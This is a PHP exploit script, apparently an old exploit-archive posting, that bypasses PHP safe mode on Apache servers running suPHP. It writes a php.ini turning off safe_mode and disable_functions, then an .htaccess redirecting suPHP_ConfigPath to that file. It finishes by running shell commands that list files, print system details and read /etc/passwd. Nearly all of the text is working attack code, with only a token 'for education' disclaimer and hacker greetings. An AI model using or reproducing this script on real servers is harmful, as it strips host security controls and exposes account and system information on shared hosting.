apachesuphp-bypass.txt
Posted on 31 December 2008
<? /* apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit Author : Mr.SaFa7 Home : v4-team.com note : this exploit for education :) */ echo "[+] Start... "; $bypfile=fopen('php.ini','w+'); $stuffile=fopen('.htaccess','w+'); if($bypfile and $stuffile!= NULL){ echo "[+] evil files created succes ! "; } else{ echo "[-] access denial ! "; } $byprullz1="safe_mode = OFF "; $byprullz2="disable_functions = NONE"; $dj=fwrite($bypfile,$byprullz1); $dj1=fwrite($bypfile,$byprullz2); fclose($bypfile); if($dj and $dj1!= NULL){ echo "[+] php.ini writed "; } else{ echo "[-] 404 php.ini not found ! "; } $breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path $sf7=fwrite($stuffile,$breakrullz); fclose($stuffile); if($sf7!= NULL){ echo "[+] evil .htaccess writed "; echo "[+] exploited by success! "; echo " [+] discouvred by Mr.SaFa7 "; echo " [+] home : v4-team.com "; echo " [+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS "; } else{ echo "[-] evil .htaccess Not found! "; } system("pwd;ls -lia;uname -a;cat /etc/passwd"); #EOF ?>
